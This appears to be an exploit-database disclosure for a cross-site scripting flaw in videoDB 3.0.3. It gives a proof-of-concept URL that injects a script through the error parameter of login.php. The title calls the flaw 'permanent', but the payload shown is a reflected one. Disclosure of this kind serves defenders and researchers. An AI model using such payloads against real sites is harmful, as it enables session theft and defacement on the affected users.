id: 10811
date: 02/09/2010
title: VideoDB version 3.0.3 XSS Vulnerability
author: vr
cves: 

=======================================
VideoDB version 3.0.3 XSS Vulnerability
=======================================

# Exploit Title: Permanent Cross-Site Scripting (XSS) in videoDB 3.0.3
# Date: 2010-02-07
# Author: vr
# Software Link: http://www.videodb.net/
# Tested on: 3.0.3
# CVE : ()


http://localhost/videodb/login.php?error=%3Cscript%3Ealert%20%28%27XSS%27%29%3C/script%3E



#  0day.today [2023-03-25]  #